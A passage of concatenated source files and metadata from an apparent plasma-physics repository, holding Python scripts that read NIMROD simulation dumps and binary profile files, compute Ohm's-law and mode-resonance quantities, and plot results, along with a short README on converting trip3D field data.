compeq=veq.div()*neq\n #todo add linear and nonlinear compresson\n nddiffusion=(nddiff*npert.grad()).div()\n self.ndict['advecteq']=advecteq\n self.ndict['advectlin']=advectlin\n self.ndict['advectnon']=advectnon\n self.ndict['dompeq']=compeq\n self.ndict['lindiff']=nddiffusion\n return None\n\n def momentum(self,grid=None):\n #todo\n pass\n\n def temperature(self,grid=None):\n #todo\n pass\n\n @timer.timer_func\n def ohms(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n self.edict={}\n ohmslaw=self.physics_nml.get('ohms','mhd')\n neoe_flag = self.closure_nml.get('neoe_flag',None)\n mu_e=self.closure_nml.get('mu_e',0.0)\n try:\n self.elecd=self.physics_nml.get('elecd',0.0)\n if isinstance(self.elecd,(np.ndarray,list)):\n self.elecd=self.elecd[0]\n except:\n print(\"Can't read elecd from nimrod.in\")\n raise KeyError\n\n if 'veq' not in self.fielddict:\n self.eval_v(grid)\n if 'beq' not in self.fielddict:\n self.eval_b(grid)\n if 'jeq' not in self.fielddict:\n self.eval_j(grid)\n if 'diff_shape' not in self.fielddict:\n self.eval_diff(grid)\n veq=self.fielddict['veq']\n vpert=self.fielddict['vpert']\n beq=self.fielddict['beq']\n bpert=self.fielddict['bpert']\n jeq=self.fielddict['jeq']\n jpert=self.fielddict['jpert']\n diff_shape=self.fielddict['diff_shape']\n\n do_eq=False\n if do_eq:\n veqbeq=-veq.cross(beq)\n etajeq=self.mu0*self.elecd*diff_shape[0]*jeq\n self.edict['veqbeq']=veqbeq\n self.edict['etajeq']=etajeq\n\n vpbeq=-vpert.cross(beq)\n veqbp=-veq.cross(bpert)\n vpbp=-vpert.cross(bpert)\n etajpert=self.mu0*self.elecd*diff_shape[0]*jpert\n self.edict['vpbeq']=vpbeq\n self.edict['veqbp']=veqbp\n self.edict['vpbp']=vpbp\n self.edict['etajpert']=etajpert\n\n if ohmslaw in ['mhd&hall','2fl']:\n #TODO\n print(\"Hall and two fluid Ohms law are not yet supported\")\n raise ValueError\n if 'neq' not in self.fielddict:\n self.eval_n(grid)\n if 'peq' not in self.fielddict:\n self.eval_p(grid)\n neq=self.fielddict['neq']\n npert=self.fielddict['npert']\n\n\n\n if neoe_flag in ['gianakon']:\n if 'neq' not in self.fielddict:\n self.eval_n(grid)\n if 'fsa_beq2' not in self.fielddict:\n self.eval_fsa_beq2(grid)\n neq=self.fielddict['neq']\n fsa_beq2=self.fielddict['fsa_beq2']\n\n ephi=[0,0,1]\n etor=fc.basis_vector('p',rzp,torgeom=True)\n bep=beq-beq.dot(etor)*etor\n neo_mask=self.eval_neo_mask(grid)\n coef=self.me*mu_e/(self.qe**2)*neo_mask\n coef1=self.me*mu_e/(self.qe)*neo_mask\n #coef=neo_mask*mu_e\n\n divpie=coef/neq*fsa_beq2*(jpert.dot(bep))/(beq.dot(bep)**2+1.0e-8) * bep\n self.edict['divpie']=divpie\n\n divpie1=coef1*fsa_beq2*(jpert.dot(bep))/(beq.dot(bep)**2+1.0e-8) * bep\n self.edict['divpie1']=divpie1\n\n divpie0=coef/neq*fsa_beq2*(bep.mag())/(beq.dot(bep)**2+1.0e-8) * bep\n self.edict['divpie0']=divpie0\n\n divpieb=coef1*fsa_beq2*(bep.mag())/(beq.dot(bep)**2+1.0e-8) * bep\n self.edict['divpieb']=divpieb\n \n #pn.PlotNimrod.plot_scalar_plane(rzp[:,:,:,0], fsa_beq2.data[:,:,0])\n #pn.PlotNimrod.plot_scalar_plane(rzp[:,:,:,0], divpie.data[0,:,:,0])\n #pn.PlotNimrod.plot_scalar_plane(rzp[:,:,:,0], divpie.data[1,:,:,0])\n return None\n\n @timer.timer_func\n def induction(self,grid=None):\n self.ohms(grid)\n self.dbdtdict={}\n for key, value in self.edict.items():\n self.dbdtdict[key]=-value.curl()\n '''\n fig=plt.figure(figsize=(6,8))\n ax=fig.add_subplot(111)\n ax.set_aspect('equal')\n # levels = numpy.linspace(fmin, fmax, nlvls)\n levels = 50\n cf = ax.contourf(self.grid.rzp[0,:,:,0], self.grid.rzp[1,:,:,0], self.dbdtdict[key].data[0,:,:,0], levels)\n plt.colorbar(cf)\n plt.title(key)\n plt.tight_layout()\n plt.show()\n fig=plt.figure(figsize=(6,8))\n ax=fig.add_subplot(111)\n ax.set_aspect('equal')\n # levels = numpy.linspace(fmin, fmax, nlvls)\n levels = 50\n cf = ax.contourf(self.grid.rzp[0,:,:,0], self.grid.rzp[1,:,:,0], self.dbdtdict[key].data[1,:,:,0], levels)\n plt.colorbar(cf)\n plt.title(key)\n plt.tight_layout()\n plt.show()\n thisfft=self.fft(self.dbdtdict[key])\n print(self.dbdtdict[key].data.shape)\n print(thisfft.shape)\n print(thisfft[0,50,:,1])\n print(thisfft[0,50,:,-1])\n print(type(thisfft.real),type(self.dbdtdict[key].data))\n print(self.dbdtdict[key].data[0,50,:,0])\n\n print(np.nanmax(thisfft.real[0,50,:,0]))\n fig=plt.figure(figsize=(6,8))\n ax=fig.add_subplot(111)\n ax.set_aspect('equal')\n # levels = numpy.linspace(fmin, fmax, nlvls)\n levels = 50\n cf = ax.contourf(self.grid.rzp[0,:,:,0], self.grid.rzp[1,:,:,0], thisfft.real[0,:,:,1], levels)\n plt.colorbar(cf)\n plt.title(f\"fft {key}\")\n plt.tight_layout()\n plt.show()\n '''\n return None\n" }, { "alpha_fraction": 0.524592399597168, "alphanum_fraction": 0.5577507615089417, "avg_line_length": 34.48039245605469, "blob_id": "af2cedddd793add3760ed378383033de5ba4251a", "content_id": "f1976717e08867b33027a8e4760d4ec7fd378b8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7238, "license_type": "no_license", "max_line_length": 113, "num_lines": 204, "path": "/surfmnNim2/xySliceClass.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport struct\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass xyClass:\n ''' Base clase for reading ax xy file'''\n def readxySlice(self):\n ''' Read xy_slice.bin '''\n npx=self.mx*self.pd+1\n npy=self.my*self.pd+1\n tf=np.zeros(47,dtype='f',order='F')\n self.ix=np.zeros([npx,npy],dtype='f',order='F')\n self.iy=np.zeros([npx,npy],dtype='f',order='F')\n self.R=np.zeros([npx,npy],dtype='f',order='F')\n self.Z=np.zeros([npx,npy],dtype='f',order='F')\n self.B0R=np.zeros([npx,npy],dtype='f',order='F')\n self.B0Z=np.zeros([npx,npy],dtype='f',order='F')\n self.B0T=np.zeros([npx,npy],dtype='f',order='F')\n self.J0R=np.zeros([npx,npy],dtype='f',order='F')\n self.J0Z=np.zeros([npx,npy],dtype='f',order='F')\n self.J0T=np.zeros([npx,npy],dtype='f',order='F') \n self.V0R=np.zeros([npx,npy],dtype='f',order='F')\n self.V0Z=np.zeros([npx,npy],dtype='f',order='F')\n self.V0T=np.zeros([npx,npy],dtype='f',order='F')\n self.P0=np.zeros([npx,npy],dtype='f',order='F')\n self.PE0=np.zeros([npx,npy],dtype='f',order='F')\n self.n0=np.zeros([npx,npy],dtype='f',order='F')\n self.diff=np.zeros([npx,npy],dtype='f',order='F')\n self.BRr=np.zeros([npx,npy],dtype='f',order='F')\n self.BZr=np.zeros([npx,npy],dtype='f',order='F')\n self.BTr=np.zeros([npx,npy],dtype='f',order='F')\n self.BRi=np.zeros([npx,npy],dtype='f',order='F')\n self.BZi=np.zeros([npx,npy],dtype='f',order='F')\n self.BTi=np.zeros([npx,npy],dtype='f',order='F')\n self.JRr=np.zeros([npx,npy],dtype='f',order='F')\n self.JZr=np.zeros([npx,npy],dtype='f',order='F')\n self.JTr=np.zeros([npx,npy],dtype='f',order='F')\n self.JRi=np.zeros([npx,npy],dtype='f',order='F')\n self.JZi=np.zeros([npx,npy],dtype='f',order='F')\n self.JTi=np.zeros([npx,npy],dtype='f',order='F')\n self.VRr=np.zeros([npx,npy],dtype='f',order='F')\n self.VZr=np.zeros([npx,npy],dtype='f',order='F')\n self.VTr=np.zeros([npx,npy],dtype='f',order='F')\n self.VRi=np.zeros([npx,npy],dtype='f',order='F')\n self.VZi=np.zeros([npx,npy],dtype='f',order='F')\n self.VTi=np.zeros([npx,npy],dtype='f',order='F')\n self.Pr=np.zeros([npx,npy],dtype='f',order='F')\n self.Pi=np.zeros([npx,npy],dtype='f',order='F')\n self.PEr=np.zeros([npx,npy],dtype='f',order='F')\n self.PEi=np.zeros([npx,npy],dtype='f',order='F')\n self.Nr=np.zeros([npx,npy],dtype='f',order='F')\n self.Ni=np.zeros([npx,npy],dtype='f',order='F')\n self.Cr=np.zeros([npx,npy],dtype='f',order='F')\n self.Ci=np.zeros([npx,npy],dtype='f',order='F')\n self.TEr=np.zeros([npx,npy],dtype='f',order='F')\n self.TEi=np.zeros([npx,npy],dtype='f',order='F')\n self.TIr=np.zeros([npx,npy],dtype='f',order='F')\n self.TIi=np.zeros([npx,npy],dtype='f',order='F')\n self.N=np.zeros([npx,npy],dtype='f',order='F')\n\n with open(self.file,'rb') as thisFile:\n jj=0\n thisFile.seek(0)\n\n while jj < npy:\n ii=0\n while ii < npx:\n thisLine=thisFile.read(4)\n blah=struct.unpack(\">l\",thisLine)\n thisLine=thisFile.read(188)\n tf = struct.unpack(\">\"+47*'f', thisLine)\n if jj==0 and (ii==0 or ii==1):\n tf1=tf\n thisLine=thisFile.read(4)\n blah=struct.unpack(\">l\",thisLine)\n self.ix[ii,jj]=tf[0]\n self.iy[ii,jj]=tf[1]\n self.R[ii,jj]=tf[2]\n self.Z[ii,jj]=tf[3]\n self.B0R[ii,jj]=tf[4]\n self.B0Z[ii,jj]=tf[5]\n self.B0T[ii,jj]=tf[6]\n self.J0R[ii,jj]=tf[7]\n self.J0Z[ii,jj]=tf[8]\n self.J0T[ii,jj]=tf[9]\n self.V0R[ii,jj]=tf[10]\n self.V0Z[ii,jj]=tf[11]\n self.V0T[ii,jj]=tf[12]\n self.P0[ii,jj]=tf[13]\n self.PE0[ii,jj]=tf[14]\n self.n0[ii,jj]=tf[15]\n self.diff[ii,jj]=tf[16]\n self.BRr[ii,jj]=tf[17]\n self.BZr[ii,jj]=tf[18]\n self.BTr[ii,jj]=tf[19]\n self.BRi[ii,jj]=tf[20]\n self.BZi[ii,jj]=tf[21]\n self.BTi[ii,jj]=tf[22]\n self.JRr[ii,jj]=tf[23]\n self.JZr[ii,jj]=tf[24]\n self.JTr[ii,jj]=tf[25]\n self.JRi[ii,jj]=tf[26]\n self.JZi[ii,jj]=tf[27]\n self.JTi[ii,jj]=tf[28]\n self.VRr[ii,jj]=tf[29]\n self.VZr[ii,jj]=tf[30]\n self.VTr[ii,jj]=tf[31]\n self.VRi[ii,jj]=tf[32]\n self.VZi[ii,jj]=tf[33]\n self.VTi[ii,jj]=tf[34]\n self.Pr[ii,jj]=tf[35]\n self.Pi[ii,jj]=tf[36]\n self.PEr[ii,jj]=tf[37]\n self.PEi[ii,jj]=tf[38]\n self.Nr[ii,jj]=tf[39]\n self.Ni[ii,jj]=tf[40]\n self.Cr[ii,jj]=tf[41]\n self.Ci[ii,jj]=tf[42]\n self.TEr[ii,jj]=tf[43]\n self.TEi[ii,jj]=tf[44]\n self.TIr[ii,jj]=tf[45]\n self.TIi[ii,jj]=tf[46]\n ii=ii+1\n if (jj<(npy-1)):\n thisLine= thisFile.read(8)\n jj=jj+1\n\n for i in range(len(self.BRr[:,0])-1):\n for j in self.slicesy:\n self.N[i,j]=-(self.R[i,j]/self.BZr[i,j])*(self.BZr[i+1,j]-self.BZr[i,j])/(self.R[i+1,j]-self.R[i,j])\n if self.BZr[i,j]==0:\n self.N[i,j]=0\n if (self.R[i+1,j]-self.R[i,j])==0:\n self.N[i,j]=0\n self.N[-1,j]=-(self.R[-1,j]/self.BZr[-1,j])*(self.BZr[-1,j]-self.BZr[-2,j])/(self.R[-1,j]-self.R[-2,j]) \n\n def plotxySlice(self):\n ''' Plot fields in xy_slice.bin. Currently only eq fields are plotted'''\n eqRows=3\n eqCols=4\n eqFigSize=(12,10)\n eqFig, eqAxs = plt.subplots(eqRows,eqCols,figsize=eqFigSize)\n eqAxs[0,0].contourf(self.R,self.Z,self.B0R)\n eqAxs[0,0].set_aspect('equal')\n eqAxs[0,0].set_title(r'$B_r$')\n\n eqAxs[0,1].contourf(self.R,self.Z,self.B0Z)\n eqAxs[0,1].set_aspect('equal')\n eqAxs[0,1].set_title(r'$B_z$')\n\n eqAxs[0,2].contourf(self.R,self.Z,self.B0T)\n eqAxs[0,2].set_aspect('equal')\n eqAxs[0,2].set_title(r'$RB_\\phi$')\n\n eqAxs[0,3].contourf(self.R,self.Z,self.P0)\n eqAxs[0,3].set_aspect('equal')\n eqAxs[0,3].set_title(r'$Pr$')\n\n eqAxs[1,0].contourf(self.R,self.Z,self.J0R)\n eqAxs[1,0].set_aspect('equal')\n eqAxs[1,0].set_title(r'$J_r$')\n\n eqAxs[1,1].contourf(self.R,self.Z,self.J0Z)\n eqAxs[1,1].set_aspect('equal')\n eqAxs[1,1].set_title(r'$J_z$')\n\n eqAxs[1,2].contourf(self.R,self.Z,self.J0T)\n eqAxs[1,2].set_aspect('equal')\n eqAxs[1,2].set_title(r'$J_\\phi/R$')\n\n eqAxs[1,3].contourf(self.R,self.Z,self.PE0)\n eqAxs[1,3].set_aspect('equal')\n eqAxs[1,3].set_title(r'$Pr_e$')\n\n eqAxs[2,0].contourf(self.R,self.Z,self.V0R)\n eqAxs[2,0].set_aspect('equal')\n eqAxs[2,0].set_title(r'$V_r$')\n\n eqAxs[2,1].contourf(self.R,self.Z,self.V0Z)\n eqAxs[2,1].set_aspect('equal')\n eqAxs[2,1].set_title(r'$V_z$')\n\n eqAxs[2,2].contourf(self.R,self.Z,self.V0T)\n eqAxs[2,2].set_aspect('equal')\n eqAxs[2,2].set_title(r'$V_\\phi$')\n\n eqAxs[2,3].contourf(self.R,self.Z,self.n0)\n eqAxs[2,3].set_aspect('equal')\n eqAxs[2,3].set_title(r'$nd$')\n\n plt.show()\n def __init__(self,xyFile,mx,my,pd,plot):\n self.file = xyFile\n self.mx = mx\n self.my = my\n self.pd = pd\n self.intSize=4\n self.floatSize=4\n self.slicesy=[0] #not sure what this does\n self.readxySlice()\n if plot:\n self.plotxySlice()\n" }, { "alpha_fraction": 0.5935919284820557, "alphanum_fraction": 0.5992130637168884, "avg_line_length": 32.566036224365234, "blob_id": "5867c574e06708c8c2d0f78bb074e9f3a135169f", "content_id": "c9b57f7c09db4e7debc139bd4a3c249ed4130b9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3558, "license_type": "no_license", "max_line_length": 79, "num_lines": 106, "path": "/mre_analysis/mre_runner.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"Modified Rutherford Equation Runner\n\nThis script allows the user to perform a Modified Rutherford Equation\ntype analysis of the supplied NIMROD dump file or saved pickle file.\n\nThe script handles the IO file operations for a single time step. The\nactual analysis is performed in the module mre_step.py.\n\nThe input file is either a nimrod h5 dumpfile or are mre.pickle file.\nIf a dumpfile is supplied, then the correspond \"nimrod.in\" also needs\nto be present.\n\nIf the pickle command line argument is specified, then the calculated\ndata will be saved in a pickle for further reuse.\n\"\"\"\n\n\nimport os\nimport h5py\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\nimport mre_step\nimport nim_timer as nimtime\nimport matplotlib.colors as mcolors\n\n\ndef mre_main(file_name=None, args={}):\n \"\"\" Gets the file and calls the MRE analysis if not pickled\n\n Parameters\n ----------\n file_name : str\n The file to be read. It can either be a nimrod dumpfile or \n a pickle file\n \n Returns\n ----------\n None\n \"\"\"\n\n if not os.path.isfile(file_name):\n print(f\"File {file_name} not found\")\n raise IOError\n dump_pre = [\"dumpgll\", \"dump\"]\n dump_suf = [\"h5\"]\n pickle_suf = [\"pickle\"]\n pickle_pre = [\"mre\"]\n nimrodin = \"nimrod.in\"\n pre = file_name.split('.')[0]\n if pre in dump_pre:\n print(f\"Performing hc analysis from dump file\")\n # check for nimrod.in and hdf5 format\n if not os.path.isfile(nimrodin):\n print(f\"nimrod.in not found\")\n raise IOError\n if not file_name.split('.')[-1] in dump_suf:\n print(f\"dump file is not hdf5 format\")\n raise IOError\n mre = mre_step.MreStep(file_name, nimrodin) \n mre.read_dumptime()\n mre.mre_analysis()\n #mre.calculate_power_fsa(nsurf=args['npts'],**args)\n nimtime.timer.print_times()\n time, step = mre.get_time()\n print(time, step)\n #pickle data here\n if args['pickle']:\n pfile = pickle_pre[0] + '.' + str(step).zfill(5) \\\n + '.' + pickle_suf[0]\n print(f\"Writing file {pfile}\")\n with open(pfile,'wb') as file:\n mre.dump(file)\n elif pre in pickle_pre:\n print(\"pickle_pre\")\n mre = mre_step.MreStep(None, None)\n mre.load(file_name)\n print(f\"Time: {mre.time}\" )\n else:\n print(f\"File {file_name} is not a recognized file type\")\n raise IOError\n #plot data here\n if args['plot']:\n mre.interpolate_fsa(radial='rhon', npts=200, fsa=False)\n mre.default_plot()\n return None\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description = 'MRE analysis')\n parser.add_argument('file', help = 'file name')\n parser.add_argument('--plot', action = 'store_true',\n help = 'shows plots')\n parser.add_argument('--pickle', action = 'store_true',\n help = 'pickle data')\n parser.add_argument('--npts', '-n', type = int, \n default = 100, help = 'number of surfaces')\n parser.add_argument('--dpow', '-d', type = float, default = 0.5,\n help = 'Controls radial distribtuion of surfaces')\n args = vars(parser.parse_args())\n print(args)\n mre_main(file_name = args['file'], args = args)#\\\n #pickle_data=args['pickle'],read_pickle=args['read'],args=args)\n" }, { "alpha_fraction": 0.6952104568481445, "alphanum_fraction": 0.6995645761489868, "avg_line_length": 26.600000381469727, "blob_id": "06b36ba87ed009bccb3b448bf93311e8ac0bc40b", "content_id": "52c70c58ccfd44c519fd0e010cc277ef8eb2f650", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 689, "license_type": "no_license", "max_line_length": 125, "num_lines": 25, "path": "/trip2Nim/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "# TripToNim\nA collection of scripts for processing trip3D external magnetic field data and converting it into a format that NIMROD reads.\n\n## Inputs:\n - trip3D probe_gb.out\n## Outputs:\n - nimrod brmpn##.dat\n\n## Key Steps:\n - Read Trip3D probe file files \n - Fourier Transform data from physical space to configuration space\n - Write NIMROD brmp files \n\n## Status: \n - Code runs but needs to be tested.\n\n## Todo:\n - [x] Test code\n - [x] Verify sign of B toroidal\n - [x] Verify sign of phi\n - [x] Verify that I'm using the correct mode number (n or -n)\n - [x] Verify FFT normalization (where do I divide by N)\n\n## Possible Future Work: \n - Use vector potential instead of B Field" }, { "alpha_fraction": 0.5895015597343445, "alphanum_fraction": 0.6294088363647461, "avg_line_length": 32.737430572509766, "blob_id": "6e9d0901b85de888a60806c768f30d122f71151f", "content_id": "7f5b016338d2e805c7bd5694082238963ae94d32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6039, "license_type": "no_license", "max_line_length": 114, "num_lines": 179, "path": "/surfmn/surfmn_fsa_mult.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport os\nimport h5py\nimport surfmnstep\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\n\nimport fsa_surfmn as surfmn\nimport matplotlib.colors as mcolors\n\n\n''' This is a generic script for analysing a multiple dumpfile/timestep\n using the surfmn fsa scripts '''\ndef pickle_sort(file):\n return int(file.split('.')[1])\n\ndef dump_sort(file):\n return int(file.split('.')[1])\n\ndef time_hist(steplist):\n print(len(steplist))\n time=np.zeros(len(steplist))\n psi21=np.zeros(len(steplist))\n psi31=np.zeros(len(steplist))\n psi41=np.zeros(len(steplist))\n psi32=np.zeros(len(steplist))\n psi43=np.zeros(len(steplist))\n psi54=np.zeros(len(steplist))\n psi65=np.zeros(len(steplist))\n times=[]\n mlist=[-1,-2,-3,-4]\n qlist=[-1,-2,-3,-4]\n\n for istep,step in enumerate(steplist):\n print(istep,step.step, step.time)\n time[istep]=step.time\n #if step.surfmn_data==False:\n # step.read_surfmn()\n psi21[istep]=step.get_resonance(\"psi\",1,-2)\n psi31[istep]=step.get_resonance(\"psi\",1,-3)\n psi41[istep]=step.get_resonance(\"psi\",1,-4)\n psi43[istep]=step.get_resonance(\"psi\",3,-4)\n psi32[istep]=step.get_resonance(\"psi\",2,-3)\n psi54[istep]=step.get_resonance(\"psi\",4,-5)\n psi65[istep]=step.get_resonance(\"psi\",5,-6)\n if step.step==00000:\n #print(step.mr.shape,step.q.shape)\n eq_q2 = step.get_rho_q(q=-2)\n eq_q3 = step.get_rho_q(q=-3)\n eq_q65 = step.get_rho_q(q=-1.2)\n eq_q54 = step.get_rho_q(q=-1.25)\n eq_q43 = step.get_rho_q(q=-4./3.)\n eq_q32 = step.get_rho_q(q=-3./2.)\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi21*1000,label=\"2/1\")\n plt.plot(time*1000,psi31*1000,label=\"3/1\")\n plt.plot(time*1000,psi32*1000,label=\"3/2\")\n plt.plot(time*1000,psi43*1000,label=\"4/3\")\n plt.plot(time*1000,psi54*1000,label=\"5/4\")\n plt.plot(time*1000,psi65*1000,label=\"6/5\")\n plt.plot(time*1000,psi41*1000,label=\"4/1\")\n ax.legend(loc='best',frameon=True,ncol=2,fontsize=14)\n plt.title(r\"$\\psi$\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n\n\ndef surfmn_runner(show_plot=True,pickle_data=False,\\\n read_pickle=False,args=[]):\n ''' Perform surfmn analysie based on the the options\n If read pickle then it will look for pickle files else it will\n look for dump files\n '''\n\n dump_pre=[\"dumpgll\",\"dump\"]\n dump_suf=[\"h5\"]\n pickle_pre=[\"surfmn\"]\n pickle_suf=[\"pickle\"]\n nimrodin=\"nimrod.in\"\n steplist=[]\n read_new = True\n if read_pickle:\n pickle_list=glob.glob(\"surfmn*.pickle\")\n pickle_list.sort(key=pickle_sort)\n print(pickle_list)\n if len(pickle_list)<=0:\n print(\"No pickle files found\")\n raise IOError\n for iobj in pickle_list:\n with open(iobj,'rb') as file:\n surf=surfmn.fsasurfmn(None,None)\n surf.load(file)\n steplist.append(surf)\n # steplist.append(pickle.load(open(iobj, \"rb\" )))\n else: #read from dump files and calculate fsa\n dumplist=[]\n if args['folder']:\n workdir=os.getcwd()\n listobjs = os.listdir(workdir)\n listobjs.sort()\n for iobj in listobjs:\n if os.path.isdir(iobj):\n thisdir=workdir+'/'+iobj+'/dumpgll*.h5'\n dumpfiles=glob.glob(thisdir)\n for file in dumpfiles:\n dumplist.append(file)\n else:\n dumplist=glob.glob(\"dumpg*.h5\")\n dumplist.sort(key=dump_sort)\n if not os.path.isfile(nimrodin):\n print(f\"nimrod.in not found\")\n raise IOError\n\n rzo=np.array(args.get(\"rzo\",[1.768,-0.018831,0.0]))\n nsurf=args.get(\"nsurf\",150)\n fargs={}\n eqflag=args.get(\"eqflag\",1)\n mmax=args.get(\"mmax\",10)\n nmax=args.get(\"nmax\",5)\n nmodes=args.get('nmodes',-1)\n if nmodes <1 or nmodes>nmax :\n fargs['ifour']=list(range(1,nmax+1))\n else:\n start=nmax-nmodes+1\n fargs['ifour']=list(range(start,nmax+1))\n fargs['mmax']=mmax\n\n for file_name in dumplist:\n print(file_name)\n print(nimrodin)\n surf=surfmn.fsasurfmn(file_name,nimrodin)\n print(\"After init\")\n surf.get_dumptime()\n print(\"after dumptime\")\n surf.calculate(rzo=rzo,nsurf=nsurf,eqflag=eqflag,fargs=fargs)\n print(\"after calculate\")\n steplist.append(surf)\n if pickle_data:\n pfile=pickle_pre[0]+'.'+str(surf.step).zfill(5)+'.'+pickle_suf[0]\n print(f\"writing file {pfile}\")\n with open(pfile,'wb') as file:\n surf.dump(file)\n if show_plot:\n time_hist(steplist)\n plotlist=[54000]\n for step in steplist:\n if step.step in plotlist:\n step.plot()\n pass\n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Surfmn runner.')\n parser.add_argument('--plot', action='store_true',help='shows plots')\n parser.add_argument('--folder', action='store_true',help='indicates the the dump files are stored in folders')\n parser.add_argument('--pickle', action='store_true',help='pickle data')\n parser.add_argument('--read', '-r', action='store_true',help='read pickled data')\n parser.add_argument('--mmax',type=int,default=15,help=\"max poloidal mode number\")\n parser.add_argument('--nmax',type=int,default=5, help=\"max toroidal mode number\")\n parser.add_argument('--nmodes', type=int, default=-1, \\\n help=\"number of toroidal modes, defualt goes from 1 to nmax\")\n parser.add_argument('--rzo',type=float, nargs=3, default=[1.768,-0.018831,0.0], help=\"intial guess for o-point\")\n parser.add_argument('--nsurf', type=int, default=150, help=\"number of surfaces\")\n parser.add_argument('--eqflag', type=int, default=1, help=\"flag to add n=0 perturbation to eq\")\n args = vars(parser.parse_args())\n print(args)\n surfmn_runner(show_plot=args['plot'],\\\n pickle_data=args['pickle'],read_pickle=args['read'],args=args)\n" }, { "alpha_fraction": 0.5572953820228577, "alphanum_fraction": 0.6070284843444824, "avg_line_length": 34.34591293334961, "blob_id": "cee67fe6720447ff8edfe4d6721d8936f9411c5f", "content_id": "56f69155fbcef0664db95b00c3d134918abfab5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11240, "license_type": "no_license", "max_line_length": 148, "num_lines": 318, "path": "/surfmnNim/fgProfs.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport struct\nimport numpy as np\n#from mpl_toolkits.mplot3d import axes3d\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\n\n# counts based on the fact that the end of the file has two integer zeros (8) and each time adds numfields*4+8 (beginning and ending codes for data)\ndef count_time(filename,numfields):\n f=open(filename, 'rb')\n f.seek(0,2)\n fsize=f.tell()\n f.close\n return (fsize-8)/(numfields*4+8)\n\n\nlargef=16\nsmallf=8\ntitlef=18\ntickf=15\n\nplotprofs = 0\n# file size = 4* (49*(mx*pd+1)+2)*(my*pd+1)\n\n#plt.rcParams['text.usetex']=True\n\nint_size =4\nfloat_size = 4\n\n# list of file names to be read\nfiles=['/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/orginal_exb/fgprofs.bin']\n\n# Create dictionaries for each file with pertinent information\n# Not necessary for files with time data as the \"1\" dimension\nnpx={}\nnpy={}\n\n# data in binary with number of fields in numfields\nnumfields=16\npsifac={}\nrho={}\nfrb={}\nmu0_p={}\nqg={}\nmach={}\nn_den={}\nmu0_pe={}\nomgeb={}\nKpol={}\nomgp={}\nhot_den={}\nhot_temp={}\nti={}\nte={}\nresidual={}\n\n#mu=(m**-1)\n\nfor findex in range(len(files)):\n fieldcount=count_time(files[findex],numfields)\n npx[files[findex]]=fieldcount\n\n psifac[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n rho[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n frb[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n mu0_p[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n qg[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n mach[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n n_den[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n mu0_pe[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n omgeb[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n Kpol[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n omgp[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n hot_den[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n hot_temp[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n ti[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n te[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n residual[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n\n f=open(files[findex], 'rb')\n\n jj=0\n f.seek(0)\n\n while jj < npx[files[findex]] :\n #first bite is length of a string\n temp=f.read(4)\n blah=struct.unpack(\">l\",temp)\n temp=f.read(numfields*4)\n tf = struct.unpack(\">\"+numfields*'f', temp)\n #last byte is length of string read\n temp=f.read(4)\n psifac[files[findex]][jj]=tf[0]\n rho[files[findex]][jj]=tf[1]\n frb[files[findex]][jj]=tf[2]\n mu0_p[files[findex]][jj]=tf[3]\n qg[files[findex]][jj]=tf[4]\n mach[files[findex]][jj]=tf[5]\n n_den[files[findex]][jj]=tf[6]\n mu0_pe[files[findex]][jj]=tf[7]\n omgeb[files[findex]][jj]=tf[8] \n Kpol[files[findex]][jj]=tf[9]\n omgp[files[findex]][jj]=tf[10]\n hot_den[files[findex]][jj]=tf[11]\n hot_temp[files[findex]][jj]=tf[12]\n ti[files[findex]][jj]=tf[13]\n te[files[findex]][jj]=tf[14]\n residual[files[findex]][jj]=tf[15]\n \n jj=jj+1\n\n f.close()\n\n#for i in range(len(qg[files[0]])):\n# qg[files[0]][i]=qg[files[0]][i]\n\nfor i in range(len(qg[files[0]])):\n mid2=(qg[files[0]][i]+2.)*(qg[files[0]][i+1]+2.)\n if 